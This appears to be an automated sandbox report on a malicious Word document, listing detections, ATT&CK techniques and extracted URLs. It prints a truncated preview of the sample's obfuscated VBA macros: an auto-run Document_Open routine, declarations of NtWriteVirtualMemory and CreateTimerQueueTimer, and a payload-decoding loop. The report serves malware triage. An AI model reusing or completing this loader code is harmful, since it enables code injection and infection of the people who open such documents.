MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The presence of the 'Doc.Downloader.Macro' ClamAV detection strongly suggests the macro's purpose is to download a secondary payload. While the VBA code is partially obfuscated, the Document_Open subroutine is present and calls other functions, indicating an attempt to execute malicious code.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12261 bytes |
SHA-256: 7205fa046df3a1badb3a9e8d7245b55ef1d524acfa79adcd0c8de43c9f24b091 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
mongoloid
coxsackievirus = 28 + 25
Pmt 0, coxsackievirus, 14044, 12664, 7
End Sub
Attribute VB_Name = "azalea"
Attribute VB_Base = "0{E78F806D-D696-4FBD-BDD1-6EF6C9F2F02E}{E8FF2CCF-B587-42D4-B473-777EBC978C92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "vibration"
#If (8 - 68 + 460 + 42 - 95 + 353) > ((106 - 119 + 333) - (74 - 61 + 527) * 1) And ((87 - 123 + 64) - (43 - 9 - 6)) * 2 < (Win64) Then
Public Declare PtrSafe Function glissando _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (macaca As Any, ByVal diminutiveness As Any, ByVal ritualistic As Any, ByVal citrange As Any, ByVal foundered As Any, ByVal pennon As Any, ByVal addison As Any) As Long
Public Declare PtrSafe Function mournful _
Lib "ntdll " Alias _
"NtWriteVirtualMemory" (ByVal anarchist As Any, ByVal alkyd As Any, ByVal dubiety As Any, ByVal cynodontia As Any, ByVal tiliaceae As Any) As LongPtr
#End If
Function astrophyton(alleviation) As String
Dim entrap As String
Dim carvel(63) As Long
Dim mrs As Long
Dim crammer As Long
Dim alienation(63) As Long
Dim cockahoop As Long
Dim basotho(63) As Long
abstractor = abstractor * 4
Dim cebidae As Long
Dim calliphoridae() As Byte
Dim toucan As Integer
Dim diseased(6962) As Byte
montee = 10 - 43 + 258081
Dim clatter As Long
heightening = 95 - 35 + 16515012
confute = 112 - 67 + 19
opposition = 45 - 11 + 65246
barrelhouse = 49 - 50 + 4033
Dim montgomery As String
punch = 103 - 98 + 4091
anomalist = 112 - 3 + 65427
bantling = 22 - 74 + 115
Dim arrogate As Variant
endeavor = 119 - 61 + 16711622
seder = 67 - 1 + 189
angel = 112 - 9 + 262041
include = 12 - 34 + 278
Dim justification As Integer
douloureux = 123 - 13 + 7733
Dim uncommon() As Byte
uncommon = VBA.StrConv(alleviation, 120 + 8)
commix = 20 + 7
Pmt 0, commix, 9660, 22523, 6
dei = 7843
artistical = vbKeyShift - 12
For sphyrapicus = 0 To dei
If sphyrapicus Mod 2 = 0 Then
uncommon(sphyrapicus) = uncommon(sphyrapicus) - artistical
Else
uncommon(sphyrapicus) = uncommon(sphyrapicus) - (artistical - 1)
End If
Next sphyrapicus
glib = 19 + 49
Pmt 0, glib, 31624, 13508, 4
toucan = 0
sewage = maine
For mrs = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
basotho(mrs) = gasconading(mrs, confute, 63)
carvel(mrs) = gasconading(mrs, punch, 63)
alienation(mrs) = gasconading(mrs, angel, 63)
Next mrs
oscilloscope = 51 + 23
Pmt 0, oscilloscope, 7655, 25045, 3
calliphoridae = uncommon
scandalously = 84 - 48 - 32
scrubbed = 59 + 29
Pmt 0, scrubbed, 37860, 39732, 2
charybdis = 18 - 79 + 64
eightspot = eightspot
homonymy = Rnd(406)
deceitful = charybdis + 1
blighia = 78 - 3 - 73
For cebidae = 0 To dei
actual = calliphoridae(cebidae)
hippodrome = calliphoridae(cebidae + 2)
satrap = carvel(sewage(calliphoridae(cebidae + 1)))
callowness = basotho(sewage(hippodrome)) + sewage(calliphoridae(cebidae + charybdis))
cockahoop = alienation(sewage(actual)) + satrap + callowness
mrs = gasconading(cockahoop, endeavor, 55)
diseased(crammer) = gasconading(mrs, anomalist, 45)
mrs = gasconading(cockahoop, opposition, 55)
diseased(crammer + 1) = gasconading(mrs, include, 45)
diseased(crammer + blighia) = gasconading(cockahoop, seder, 55)
crammer = crammer + blighia + 1
cebidae = cebidae + 3
Next
astrophyton = diseased
End Function
Function alderman(anemometry, suffragette, reword)
Dim scaphiopus As Long
Dim nyamwezi As String
Dim doubleedged As Long
Dim mentum As Integer
Dim brawl As Long
Dim justified As Variant
Dim midterm As Long
Dim wahrheit As Long
Dim monroe As Long
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.